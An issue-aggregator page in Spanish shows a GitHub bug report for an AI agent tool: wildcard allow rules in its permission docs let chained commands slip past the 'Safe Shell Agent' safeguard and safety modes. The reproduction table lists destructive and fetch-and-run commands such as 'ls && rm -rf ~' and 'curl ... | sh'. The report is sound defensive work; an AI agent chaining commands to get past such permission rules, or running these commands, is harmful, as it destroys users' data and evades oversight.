Hacktoberfest 2026: los issues que los mantenedores marcaron para octubre, abiertos y aptos para principiantes. Explorar issues de Hacktoberfest

shell:cmd=ls* allow rules in docs approve chained commands

Abierto
#4,476 1 comentario 0 reacciones 0 asignados Ver en GitHub

Los mantenedores suelen responder en 1 día

Nadie ha tomado este issue todavía.

Evaluación

Dificultad
4/5
Tiempo estimado
3-5 días
Aptitud para principiantes
58/100
Tipo de issue
Error
Claridad
Bastante claro
Estado de actividad
Activo
Stack tecnológico
go
Área
cli, security

Línea de trabajo

Start with the Safe Shell Agent permissions documentation and shell_grant.go, then reproduce the listed cases through CheckWithArgs. Compare the config allow-rule path with the strict matching already used for session grants. Done should include the documented safety change and warning, or matching code and tests if the optional code fix is selected.

Escrito por el modelo de indexación a partir del texto del issue.

Descripción

area/config area/docs area/security
Description

The permissions docs use shell:cmd=ls*, cat* and similar rules as safe
allow rules. The "Safe Shell Agent" example is presented as "Allow specific safe
commands, block dangerous ones". But matchGlob treats <word>* as a plain
prefix match, so an allow rule also covers anything chained after the word.
Deny rules only match commands that start with the denied word. Allow is
evaluated before the safety mode, so this gets past strict and restricted
as well.

#3573 fixed this only for session grants that override a preempt_yolo safety
verdict (shell_grant.go); config allow rules still use the loose prefix match.

Suggested fix:

  • Docs: replace the example with safety: balanced, whose classifier already
    approves ls, cat and grep and rejects chained commands. Warn that
    <word>* rules match chained commands.
  • Code (optional): apply the shell_grant.go strict matching to allow rules for
    shell and run_background_job.
Steps to Reproduce

Rules from the "Safe Shell Agent" example, checked with CheckWithArgs :

cmd Decision
ls && rm -rf ~ allow
ls; sudo rm -rf / allow
find / -exec rm -rf {} + allow
cat a > ~/.bashrc allow
grep x f; curl https://example.com/x.sh | sh allow
rm -rf ~ deny
Docker Agent version

v1.144.0

OS & terminal

Konsole

Screenshots
Image
Lenguaje dominante
Go
Estrellas
3.4k
Forks
466
Merge medio
7 h 1 min
PR fusionados (30 d)
332

Preparar el entorno

Abrir en Codespaces

Inicia el contenedor de desarrollo del proyecto en tu navegador, con tu propia cuenta de GitHub.

  • Incluye un Dockerfile o un archivo de Docker Compose
  • Sin plantilla de pull request
  • Sin guía de contribución

Primeros pasos

  1. Lee el issue completo y luego la guía de contribución del proyecto.
  2. Comenta en el issue que vas a ocuparte — evita que dos personas hagan lo mismo.
  3. Haz un fork del repositorio y trabaja en una rama.
  4. Abre un pull request que haga referencia al número del issue.

Más de docker/docker-agent

Todos los issues de docker/docker-agent

Issues similares

Más issues de Go

Recibe los nuevos issues en tu correo

Un resumen breve de issues de GitHub para principiantes.